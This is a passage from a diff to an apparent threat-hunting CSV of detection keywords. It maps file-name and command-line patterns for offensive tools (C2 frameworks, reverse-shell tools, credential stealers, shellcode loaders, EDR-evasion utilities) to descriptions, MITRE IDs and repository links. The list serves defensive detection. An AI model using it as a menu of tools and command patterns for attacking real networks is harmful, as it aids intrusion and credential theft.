Defenders can use BloodHound to identify and eliminate those same attack paths. 
Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" +"*\bootkit-rs*","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","0","N/A","N/A","5","449","54","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" "*\brc.zip*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*\BrowserEnum.log*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*\Bruteforcer.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"*\bypassuac.txt*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","10","2","167","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" +"*\Bruteforcer.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*\bypassuac.txt*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","10","2","183","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" "*\C2concealer*","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","0","N/A","10","10","850","162","2021-09-26T16:37:06Z","2020-03-23T14:13:16Z" 
-"*\certipy.pfx*","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","6","566","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z" -"*\charlotte.cpp*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","930","234","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" -"*\charlotte.py*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","930","234","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" -"*\chimera.py*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","280","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" -"*\Chimera-main\*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","280","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" -"*\chisel.exe*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" -"*\chisel-master*","offensive_tool_keyword","chisel","A fast TCP/UDP 
tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*\certipy.pfx*","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","6","567","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z" +"*\charlotte.cpp*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" +"*\charlotte.py*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" +"*\chimera.py*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","282","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" +"*\Chimera-main\*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","282","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" +"*\chisel.exe*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 
TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*\chisel-master*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" "*\Chrome_pass.db*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*\chromium_based_browsers.py*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*\CIMplant.exe*","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" -"*\CloakNDaggerC2*","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. 
This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","0","N/A","10","10","4","2","2023-10-02T19:54:24Z","2023-04-28T01:58:18Z" -"*\cloud_enum.py*","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","0","N/A","6","10","1238","199","2023-07-31T07:27:37Z","2019-05-31T09:14:05Z" -"*\cme.exe* -d * -u * -H *","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*\cme.exe* -d * -u * -p *","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*\cme.exe* --shares*","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*\CloakNDaggerC2*","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","0","N/A","10","10","4","2","2023-10-04T12:32:38Z","2023-04-28T01:58:18Z" +"*\cloud_enum.py*","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. 
Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","0","N/A","6","10","1242","199","2023-07-31T07:27:37Z","2019-05-31T09:14:05Z" +"*\cme.exe* -d * -u * -H *","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*\cme.exe* -d * -u * -p *","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*\cme.exe* --shares*","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. 
CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*\codeloader.exe*","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","0","N/A","10","10","555","105","2023-08-26T12:48:08Z","2021-01-19T15:57:01Z" -"*\Coercer.py*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation 
tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z" +"*\Coercer.py*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" "*\combine.exe*","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","0","N/A","10","2","101","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z" "*\combine_gui.exe*","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","0","N/A","10","2","101","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z" "*\COM-Hunter.csproj*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" "*\COM-Hunter.exe*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" "*\COM-Hunter.sln*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - 
TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" -"*\common_pass.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*\ComunicationC2.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","48","6","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*\common_pass.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*\ComunicationC2.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" "*\Cooolis-ms-Loader\*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" -"*\crackmapexecwin*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*\crackmapexecwin*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*\cradle.ps1*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","","","" "*\Crassus-main*","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","0","N/A","10","6","503","55","2023-09-29T20:02:02Z","2023-01-12T21:01:52Z" "*\creditcards.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" 
@@ -6045,62 +6119,68 @@ "*\CrossC2.*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" "*\CROSSNET\CROSSNET\*","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - 
TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dr0op/CrossNet-Beta","1","0","N/A","10","10","352","56","2022-07-18T06:23:16Z","2021-02-08T10:52:39Z" "*\cryptolok*","offensive_tool_keyword","Github Username","redteam tools github repo ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/cryptolok","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*\curlshell-main*","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","269","28","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z" -"*\CustomEncoding.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*\curlshell-main*","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","272","29","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z" +"*\CustomEncoding.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense 
Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*\D1rkInject\*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","0","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" +"*\daclread.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\darkexe.py*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" -"*\DarkLoadLibrary.*","offensive_tool_keyword","DarkLoadLibrary","LoadLibrary for offensive operations","T1071.001 - T1055.002 - T1055.004","TA0002 - TA0005","N/A","N/A","Defense 